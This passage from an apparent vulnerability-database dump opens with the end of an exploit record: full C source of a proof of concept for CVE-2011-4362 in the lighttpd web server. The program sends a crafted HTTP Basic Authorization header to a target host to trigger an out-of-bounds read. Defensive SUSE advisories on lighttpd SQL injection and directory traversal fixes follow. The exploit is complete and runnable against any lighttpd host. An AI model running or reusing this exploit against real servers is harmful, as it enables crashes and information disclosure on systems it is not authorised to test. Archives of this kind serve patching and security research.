76 | 57)\r\n * -52(. | 77 | 57)\r\n * -51(. | 78 | 58)\r\n * -50(k | 79 | 59)\r\n * -49(0 | 80 | 60)\r\n * -48(% | 81 | 60)\r\n * -47(] | 82 | 61)\r\n * -46(p | 83 | 62)\r\n * -45(r | 84 | 63)\r\n * -44(0 | 85 | 63)\r\n * -43(% | 86 | 64)\r\n * -42(] | 87 | 65)\r\n * -41(s | 88 | 66)\r\n * -40(z | 89 | 66)\r\n * -39([ | 90 | 67)\r\n * -38(x | 91 | 68)\r\n * -37(x | 92 | 69)\r\n * -36( | 93 | 69)\r\n * -35(s | 94 | 70)\r\n * -34(d | 95 | 71)\r\n * -33(0 | 96 | 72)\r\n * -32(% | 97 | 72)\r\n * -31(] | 98 | 73)\r\n * -30(. | 99 | 74)\r\n * -29(. | 100 | 75)\r\n * -28(d | 101 | 75)\r\n * -27(c | 102 | 76)\r\n * -26(d | 103 | 77)\r\n * -25(i | 104 | 78)\r\n * -24(g | 105 | 78)\r\n * -23(b | 106 | 79)\r\n * -22(s | 107 | 80)\r\n * -21(6 | 108 | 81)\r\n * -20(- | 109 | 81)\r\n * -19(t | 110 | 82)\r\n * -18(i | 111 | 83)\r\n * -17(g | 112 | 84)\r\n * -16(f | 113 | 84)\r\n * -15(i | 114 | 85)\r\n * -14(e | 115 | 86)\r\n * -13(. | 116 | 87)\r\n * -12(. | 117 | 87)\r\n * -11(. 
| 118 | 88)\r\n * -10(. | 119 | 89)\r\n * -9(. | 120 | 90)\r\n * -8(. | 121 | 90)\r\n * -7(. | 122 | 91)\r\n * -6(. | 123 | 92)\r\n * -5(. | 124 | 93)\r\n * -4(. | 125 | 93)\r\n * -3(. | 126 | 94)\r\n * -2(. | 127 | 95)\r\n * -1(. | 128 | 96)\r\n * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * ptr[0x9a92c48] size[0xc0] used[0x60]\r\n * string [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n * --- CUT ---\r\n *\r\n * First column is the offset so vulnerability is executed like it should be\r\n * (negative offsets). Second column is byte which is read out-of-bound.\r\n *\r\n *\r\n * Maybe you can find vulnerable binary?\r\n *\r\n *\r\n * Best regards,\r\n * Adam 'pi3' Zabrocki\r\n *\r\n *\r\n * --\r\n * http://pi3.com.pl\r\n * http://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\n * http://blog.pi3.com.pl/?p=277\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <getopt.h>\r\n\r\n#define PORT 80\r\n#define SA struct sockaddr\r\n\r\nchar header[] =\r\n\"GET /%s/ HTTP/1.1\\r\\n\"\r\n\"Host: %s\\r\\n\"\r\n\"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n\"\r\n\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n\"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n\"\r\n\"Accept-Encoding: gzip, deflate\\r\\n\"\r\n\"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\r\n\"Proxy-Connection: keep-alive\\r\\n\"\r\n\"Authorization: Basic \";\r\n\r\nchar header_port[] =\r\n\"GET /%s/ HTTP/1.1\\r\\n\"\r\n\"Host: %s:%d\\r\\n\"\r\n\"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n\"\r\n\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\n\"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n\"\r\n\"Accept-Encoding: gzip, deflate\\r\\n\"\r\n\"Accept-Charset: 
ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\r\n\"Proxy-Connection: keep-alive\\r\\n\"\r\n\"Authorization: Basic \";\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n int i=PORT,opt=0,sockfd;\r\n char *remote_dir = NULL;\r\n char *r_hostname = NULL;\r\n struct sockaddr_in servaddr;\r\n struct hostent *h = NULL;\r\n char *buf;\r\n unsigned int len = 0x0;\r\n\r\n\r\n if (!argv[1])\r\n usage(argv[0]);\r\n\r\n\r\n printf(\"\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n\");\r\n printf(\"\\n\\t\\t[+] Preparing arguments... \");\r\n while((opt = getopt(argc,argv,\"h:d:p:?\")) != -1) {\r\n switch(opt) {\r\n\r\n case 'h':\r\n\r\n r_hostname = strdup(optarg);\r\n if ( (h = gethostbyname(r_hostname))==NULL) {\r\n printf(\"Gethostbyname() field!\\n\");\r\n exit(-1);\r\n }\r\n break;\r\n\r\n case 'p':\r\n\r\n i=atoi(optarg);\r\n break;\r\n\r\n case 'd':\r\n\r\n remote_dir = strdup(optarg);\r\n break;\r\n\r\n case '?':\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n default:\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n }\r\n }\r\n\r\n if (!remote_dir || !h) {\r\n usage(argv[0]);\r\n exit(-1);\r\n }\r\n\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_port = htons(i);\r\n servaddr.sin_addr = *(struct in_addr*)h->h_addr;\r\n\r\n len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;\r\n if ( (buf = (char *)malloc(len)) == NULL) {\r\n printf(\"malloc() :(\\n\");\r\n exit(-1);\r\n }\r\n memset(buf,0x0,len);\r\n\r\n if (i != 80)\r\n snprintf(buf,len,header_port,remote_dir,r_hostname,i);\r\n else\r\n snprintf(buf,len,header,remote_dir,r_hostname);\r\n\r\n for (i=0;i<130;i++)\r\n buf[strlen(buf)] = 127+i;\r\n\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n\r\n printf(\"OK\\n\\t\\t[+] Creating socket... 
\");\r\n if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {\r\n printf(\"Socket() error!\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"OK\\n\\t\\t[+] Connecting to [%s]... \",r_hostname);\r\n if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {\r\n printf(\"Connect() error!\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"OK\\n\\t\\t[+] Sending dirty packet... \");\r\n// write(1,buf,strlen(buf));\r\n write(sockfd,buf,strlen(buf));\r\n\r\n printf(\"OK\\n\\n\\t\\t[+] Check the website!\\n\\n\");\r\n\r\n close(sockfd);\r\n\r\n}\r\n\r\nint usage(char *arg) {\r\n\r\n printf(\"\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n\");\r\n printf(\"\\n\\tUsage: %s <options>\\n\\n\\t\\tOptions:\\n\",arg);\r\n printf(\"\\t\\t\\t -v <victim>\\n\\t\\t\\t -p <port>\\n\\t\\t\\t -d <remote_dir_for_auth>\\n\\n\");\r\n exit(0);\r\n}\r\n\r\n\r\n\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17319"}], "suse": [{"lastseen": "2016-09-04T12:39:55", "bulletinFamily": "unix", "description": "lighttpd was updated to version 1.4.35, fixing bugs and\n security issues:\n\n CVE-2014-2323: SQL injection vulnerability in\n mod_mysql_vhost.c in lighttpd allowed remote attackers to\n execute arbitrary SQL commands via the host name, related\n to request_check_hostname.\n\n CVE-2014-2323: Multiple directory traversal vulnerabilities\n in (1) mod_evhost and (2) mod_simple_vhost in lighttpd\n allowed remote attackers to read arbitrary files via a ..\n (dot dot) in the host name, related to\n request_check_hostname.\n\n More information can be found on the lighttpd advisory\n page:\n <a rel=\"nofollow\" href=\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2\">http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2</a>\n 014_01.txt\n\n Other changes:\n * [network/ssl] fix build error if TLSEXT is disabled\n * [mod_fastcgi] fix use after free (only triggered if\n fastcgi 
debug is active)\n * [mod_rrdtool] fix invalid read (string not null\n terminated)\n * [mod_dirlisting] fix memory leak if pcre fails\n * [mod_fastcgi,mod_scgi] fix resource leaks on spawning\n backends\n * [mod_magnet] fix memory leak\n * add comments for switch fall throughs\n * remove logical dead code\n * [buffer] fix length check in buffer_is_equal_right_len\n * fix resource leaks in error cases on config parsing and\n other initializations\n * add force_assert() to enforce assertions as simple\n assert()s are disabled by -DNDEBUG (fixes #2546)\n * [mod_cml_lua] fix null pointer dereference\n * force assertion: setting FD_CLOEXEC must work (if\n available)\n * [network] check return value of lseek()\n * fix unchecked return values from\n stream_open/stat_cache_get_entry\n * [mod_webdav] fix logic error in handling file creation\n error\n * check length of unix domain socket filenames\n * fix SQL injection / host name validation (thx Jann Horn)\n for all the changes see\n /usr/share/doc/packages/lighttpd/NEWS\n\n", "modified": "2014-03-26T17:04:44", "published": "2014-03-26T17:04:44", "id": "OPENSUSE-SU-2014:0449-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-03/msg00023.html", "title": "lighttpd to 1.4.35 (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:43:05", "bulletinFamily": "unix", "description": "The HTTP server lighttpd was updated to fix the following\n security issues:\n\n * CVE-2014-2323: SQL injection vulnerability in\n mod_mysql_vhost.c in lighttpd allowed remote attackers to\n execute arbitrary SQL commands via the host name.\n * CVE-2014-2324: Multiple directory traversal\n vulnerabilities in mod_evhost and mod_simple_vhost in\n lighttpd allowed remote attackers to read arbitrary files\n via .. 
(dot dot) in the host name.\n\n More information can be found on the lighttpd advisory\n page:\n <a rel=\"nofollow\" href=\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt\">http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt</a>\n <<a rel=\"nofollow\" href=\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt\">http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt</a>>\n\n Security Issues references:\n\n * CVE-2014-2323\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2323\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2323</a>\n >\n * CVE-2014-2324\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2324\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2324</a>\n >\n\n", "modified": "2014-04-03T19:04:18", "published": "2014-04-03T19:04:18", "id": "SUSE-SU-2014:0474-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00002.html", "type": "suse", "title": "Security update for lighttpd (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:10:59", "bulletinFamily": "unix", "description": "lighttpd was updated to version 1.4.35, fixing bugs and\n security issues:\n\n CVE-2014-2323: SQL injection vulnerability in\n mod_mysql_vhost.c in lighttpd allowed remote attackers to\n execute arbitrary SQL commands via the host name, related\n to request_check_hostname.\n\n CVE-2014-2324: Multiple directory traversal vulnerabilities\n in (1) mod_evhost and (2) mod_simple_vhost in lighttpd\n allowed remote attackers to read arbitrary files via a ..\n (dot dot) in the host name, related to\n request_check_hostname.\n\n More information can be found on the lighttpd advisory\n page:\n <a rel=\"nofollow\" 
href=\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt\">http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt</a>\n\n Other changes:\n * [network/ssl] fix build error if TLSEXT is disabled\n * [mod_fastcgi] fix use after free (only triggered if\n fastcgi debug is active)\n * [mod_rrdtool] fix invalid read (string not null\n terminated)\n * [mod_dirlisting] fix memory leak if pcre fails\n * [mod_fastcgi,mod_scgi] fix resource leaks on spawning\n backends\n * [mod_magnet] fix memory leak\n * add comments for switch fall throughs\n * remove logical dead code\n * [buffer] fix length check in buffer_is_equal_right_len\n * fix resource leaks in error cases on config parsing and\n other initializations\n * add force_assert() to enforce assertions as simple\n assert()s are disabled by -DNDEBUG (fixes #2546)\n * [mod_cml_lua] fix null pointer dereference\n * force assertion: setting FD_CLOEXEC must work (if\n available)\n * [network] check return value of lseek()\n * fix unchecked return values from\n stream_open/stat_cache_get_entry\n * [mod_webdav] fix logic error in handling file creation\n error\n * check length of unix domain socket filenames\n * fix SQL injection / host name validation (thx Jann\n Horn)\n for all the changes see\n /usr/share/doc/packages/lighttpd/NEWS\n\n", "modified": "2014-04-08T21:06:06", "published": "2014-04-08T21:06:06", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00006.html", "id": "OPENSUSE-SU-2014:0496-1", "type": "suse", "title": "lighttpd to 1.4.35 (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}